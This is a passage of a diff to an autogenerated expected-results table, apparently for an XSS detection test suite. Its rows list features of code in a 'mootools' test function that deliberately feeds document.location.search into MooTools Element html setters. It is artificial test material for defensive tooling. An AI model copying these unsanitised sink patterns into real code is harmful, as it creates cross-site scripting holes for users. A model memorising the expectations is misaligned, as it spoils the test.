"div" | CalleeFlexibleAccessPath | Element | +| autogenerated/Xss/DomBasedXss/tst.js:440:14:440:18 | "div" | InputArgumentIndex | 0 | +| autogenerated/Xss/DomBasedXss/tst.js:440:14:440:18 | "div" | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:440:14:440:18 | "div" | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:440:14:440:18 | "div" | enclosingFunctionBody | source document location search Element div Element div text source Element div html source Element div set html source Element div set html source Element div setProperty html source Element div setProperties html source Element div appendHtml source | +| autogenerated/Xss/DomBasedXss/tst.js:440:14:440:18 | "div" | enclosingFunctionName | mootools | +| autogenerated/Xss/DomBasedXss/tst.js:440:14:440:18 | "div" | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:440:21:440:34 | {html: source} | CalleeFlexibleAccessPath | Element | +| autogenerated/Xss/DomBasedXss/tst.js:440:21:440:34 | {html: source} | InputArgumentIndex | 1 | +| autogenerated/Xss/DomBasedXss/tst.js:440:21:440:34 | {html: source} | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:440:21:440:34 | {html: source} | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:440:21:440:34 | {html: source} | enclosingFunctionBody | source document location search Element div Element div text source Element div html source Element div set html source Element div set html source Element div setProperty html source Element div setProperties html source Element div appendHtml source | +| autogenerated/Xss/DomBasedXss/tst.js:440:21:440:34 | {html: source} | enclosingFunctionName | mootools | +| autogenerated/Xss/DomBasedXss/tst.js:440:21:440:34 | {html: source} | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:440:22:440:25 | html | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:440:22:440:25 | html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:440:22:440:25 | html | enclosingFunctionBody | source document location search Element div Element div text source Element div html source Element div set html source Element div set html source Element div setProperty html source Element div setProperties html source Element div appendHtml source | +| autogenerated/Xss/DomBasedXss/tst.js:440:22:440:25 | html | enclosingFunctionName | mootools | +| autogenerated/Xss/DomBasedXss/tst.js:440:22:440:25 | html | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:440:22:440:33 | html: source | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:440:22:440:33 | html: source | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:440:22:440:33 | html: source | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:440:22:440:33 | html: source | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:440:22:440:33 | html: source | enclosingFunctionBody | source document location search Element div Element div text source Element div html source Element div set html source Element div set html source Element div setProperty html source Element div setProperties html source Element div appendHtml source | +| autogenerated/Xss/DomBasedXss/tst.js:440:22:440:33 | html: source | enclosingFunctionBody | source document location search Element div Element div text source Element div html source Element div set html source Element div set html source Element div setProperty html source Element div setProperties html source Element div appendHtml source | +| autogenerated/Xss/DomBasedXss/tst.js:440:22:440:33 | html: source | enclosingFunctionName | mootools | +| autogenerated/Xss/DomBasedXss/tst.js:440:22:440:33 | html: source | enclosingFunctionName | mootools | +| autogenerated/Xss/DomBasedXss/tst.js:440:22:440:33 | html: source | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:440:22:440:33 | html: source | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:440:28:440:33 | source | CalleeFlexibleAccessPath | Element | | autogenerated/Xss/DomBasedXss/tst.js:440:28:440:33 | source | InputAccessPathFromCallee | ?.html | | autogenerated/Xss/DomBasedXss/tst.js:440:28:440:33 | source | InputArgumentIndex | 1 | @@ -17634,6 +122608,48 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:440:28:440:33 | source | enclosingFunctionBody | source document location search Element div Element div text source Element div html source Element div set html source Element div set html source Element div setProperty html source Element div setProperties html source Element div appendHtml source | | autogenerated/Xss/DomBasedXss/tst.js:440:28:440:33 | source | enclosingFunctionName | mootools | | autogenerated/Xss/DomBasedXss/tst.js:440:28:440:33 | source | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:441:2:441:19 | exceptional return of new Element("div") | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:441:2:441:19 | exceptional return of new Element("div") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:441:2:441:19 | exceptional return of new Element("div") | enclosingFunctionBody | source document location search Element div Element div text source Element div html source Element div set html source Element div set html source Element div setProperty html source Element div setProperties html source Element div appendHtml source | +| autogenerated/Xss/DomBasedXss/tst.js:441:2:441:19 | exceptional return of new Element("div") | enclosingFunctionName | mootools | +| autogenerated/Xss/DomBasedXss/tst.js:441:2:441:19 | exceptional return of new Element("div") | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:441:2:441:19 | new Element("div") | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:441:2:441:19 | new Element("div") | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:441:2:441:19 | new Element("div") | enclosingFunctionBody | source document location search Element div Element div text source Element div html source Element div set html source Element div set html source Element div setProperty html source Element div setProperties html source Element div appendHtml source | +| autogenerated/Xss/DomBasedXss/tst.js:441:2:441:19 | new Element("div") | enclosingFunctionName | mootools | +| autogenerated/Xss/DomBasedXss/tst.js:441:2:441:19 | new Element("div") | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:441:2:441:23 | new Ele ... v").set | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:441:2:441:23 | new Ele ... v").set | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:441:2:441:23 | new Ele ... v").set | enclosingFunctionBody | source document location search Element div Element div text source Element div html source Element div set html source Element div set html source Element div setProperty html source Element div setProperties html source Element div appendHtml source | +| autogenerated/Xss/DomBasedXss/tst.js:441:2:441:23 | new Ele ... v").set | enclosingFunctionName | mootools | +| autogenerated/Xss/DomBasedXss/tst.js:441:2:441:23 | new Ele ... v").set | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:441:2:441:39 | exceptional return of new Ele ... source) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:441:2:441:39 | exceptional return of new Ele ... source) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:441:2:441:39 | exceptional return of new Ele ... source) | enclosingFunctionBody | source document location search Element div Element div text source Element div html source Element div set html source Element div set html source Element div setProperty html source Element div setProperties html source Element div appendHtml source | +| autogenerated/Xss/DomBasedXss/tst.js:441:2:441:39 | exceptional return of new Ele ... source) | enclosingFunctionName | mootools | +| autogenerated/Xss/DomBasedXss/tst.js:441:2:441:39 | exceptional return of new Ele ... source) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:441:2:441:39 | new Ele ... source) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:441:2:441:39 | new Ele ... source) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:441:2:441:39 | new Ele ... source) | enclosingFunctionBody | source document location search Element div Element div text source Element div html source Element div set html source Element div set html source Element div setProperty html source Element div setProperties html source Element div appendHtml source | +| autogenerated/Xss/DomBasedXss/tst.js:441:2:441:39 | new Ele ... source) | enclosingFunctionName | mootools | +| autogenerated/Xss/DomBasedXss/tst.js:441:2:441:39 | new Ele ... source) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:441:6:441:12 | Element | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:441:6:441:12 | Element | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:441:6:441:12 | Element | enclosingFunctionBody | source document location search Element div Element div text source Element div html source Element div set html source Element div set html source Element div setProperty html source Element div setProperties html source Element div appendHtml source | +| autogenerated/Xss/DomBasedXss/tst.js:441:6:441:12 | Element | enclosingFunctionName | mootools | +| autogenerated/Xss/DomBasedXss/tst.js:441:6:441:12 | Element | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:441:14:441:18 | "div" | CalleeFlexibleAccessPath | Element | +| autogenerated/Xss/DomBasedXss/tst.js:441:14:441:18 | "div" | InputArgumentIndex | 0 | +| autogenerated/Xss/DomBasedXss/tst.js:441:14:441:18 | "div" | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:441:14:441:18 | "div" | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:441:14:441:18 | "div" | enclosingFunctionBody | source document location search Element div Element div text source Element div html source Element div set html source Element div set html source Element div setProperty html source Element div setProperties html source Element div appendHtml source | +| autogenerated/Xss/DomBasedXss/tst.js:441:14:441:18 | "div" | enclosingFunctionName | mootools | +| autogenerated/Xss/DomBasedXss/tst.js:441:14:441:18 | "div" | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:441:21:441:23 | set | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:441:21:441:23 | set | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:441:21:441:23 | set | enclosingFunctionBody | source document location search Element div Element div text source Element div html source Element div set html source Element div set html source Element div setProperty html source Element div setProperties html source Element div appendHtml source | +| autogenerated/Xss/DomBasedXss/tst.js:441:21:441:23 | set | enclosingFunctionName | mootools | +| autogenerated/Xss/DomBasedXss/tst.js:441:21:441:23 | set | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:441:25:441:30 | "html" | CalleeFlexibleAccessPath | Element().set | | autogenerated/Xss/DomBasedXss/tst.js:441:25:441:30 | "html" | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:441:25:441:30 | "html" | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -17648,6 +122664,48 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:441:33:441:38 | source | enclosingFunctionBody | source document location search Element div Element div text source Element div html source Element div set html source Element div set html source Element div setProperty html source Element div setProperties html source Element div appendHtml source | | autogenerated/Xss/DomBasedXss/tst.js:441:33:441:38 | source | enclosingFunctionName | mootools | | autogenerated/Xss/DomBasedXss/tst.js:441:33:441:38 | source | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:442:2:442:19 | exceptional return of new Element("div") | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:442:2:442:19 | exceptional return of new Element("div") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:442:2:442:19 | exceptional return of new Element("div") | enclosingFunctionBody | source document location search Element div Element div text source Element div html source Element div set html source Element div set html source Element div setProperty html source Element div setProperties html source Element div appendHtml source | +| autogenerated/Xss/DomBasedXss/tst.js:442:2:442:19 | exceptional return of new Element("div") | enclosingFunctionName | mootools | +| autogenerated/Xss/DomBasedXss/tst.js:442:2:442:19 | exceptional return of new Element("div") | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:442:2:442:19 | new Element("div") | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:442:2:442:19 | new Element("div") | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:442:2:442:19 | new Element("div") | enclosingFunctionBody | source document location search Element div Element div text source Element div html source Element div set html source Element div set html source Element div setProperty html source Element div setProperties html source Element div appendHtml source | +| autogenerated/Xss/DomBasedXss/tst.js:442:2:442:19 | new Element("div") | enclosingFunctionName | mootools | +| autogenerated/Xss/DomBasedXss/tst.js:442:2:442:19 | new Element("div") | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:442:2:442:23 | new Ele ... v").set | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:442:2:442:23 | new Ele ... v").set | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:442:2:442:23 | new Ele ... v").set | enclosingFunctionBody | source document location search Element div Element div text source Element div html source Element div set html source Element div set html source Element div setProperty html source Element div setProperties html source Element div appendHtml source | +| autogenerated/Xss/DomBasedXss/tst.js:442:2:442:23 | new Ele ... v").set | enclosingFunctionName | mootools | +| autogenerated/Xss/DomBasedXss/tst.js:442:2:442:23 | new Ele ... v").set | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:442:2:442:41 | exceptional return of new Ele ... ource}) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:442:2:442:41 | exceptional return of new Ele ... ource}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:442:2:442:41 | exceptional return of new Ele ... ource}) | enclosingFunctionBody | source document location search Element div Element div text source Element div html source Element div set html source Element div set html source Element div setProperty html source Element div setProperties html source Element div appendHtml source | +| autogenerated/Xss/DomBasedXss/tst.js:442:2:442:41 | exceptional return of new Ele ... ource}) | enclosingFunctionName | mootools | +| autogenerated/Xss/DomBasedXss/tst.js:442:2:442:41 | exceptional return of new Ele ... ource}) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:442:2:442:41 | new Ele ... ource}) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:442:2:442:41 | new Ele ... ource}) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:442:2:442:41 | new Ele ... ource}) | enclosingFunctionBody | source document location search Element div Element div text source Element div html source Element div set html source Element div set html source Element div setProperty html source Element div setProperties html source Element div appendHtml source | +| autogenerated/Xss/DomBasedXss/tst.js:442:2:442:41 | new Ele ... ource}) | enclosingFunctionName | mootools | +| autogenerated/Xss/DomBasedXss/tst.js:442:2:442:41 | new Ele ... ource}) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:442:6:442:12 | Element | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:442:6:442:12 | Element | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:442:6:442:12 | Element | enclosingFunctionBody | source document location search Element div Element div text source Element div html source Element div set html source Element div set html source Element div setProperty html source Element div setProperties html source Element div appendHtml source | +| autogenerated/Xss/DomBasedXss/tst.js:442:6:442:12 | Element | enclosingFunctionName | mootools | +| autogenerated/Xss/DomBasedXss/tst.js:442:6:442:12 | Element | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:442:14:442:18 | "div" | CalleeFlexibleAccessPath | Element | +| autogenerated/Xss/DomBasedXss/tst.js:442:14:442:18 | "div" | InputArgumentIndex | 0 | +| autogenerated/Xss/DomBasedXss/tst.js:442:14:442:18 | "div" | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:442:14:442:18 | "div" | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:442:14:442:18 | "div" | enclosingFunctionBody | source document location search Element div Element div text source Element div html source Element div set html source Element div set html source Element 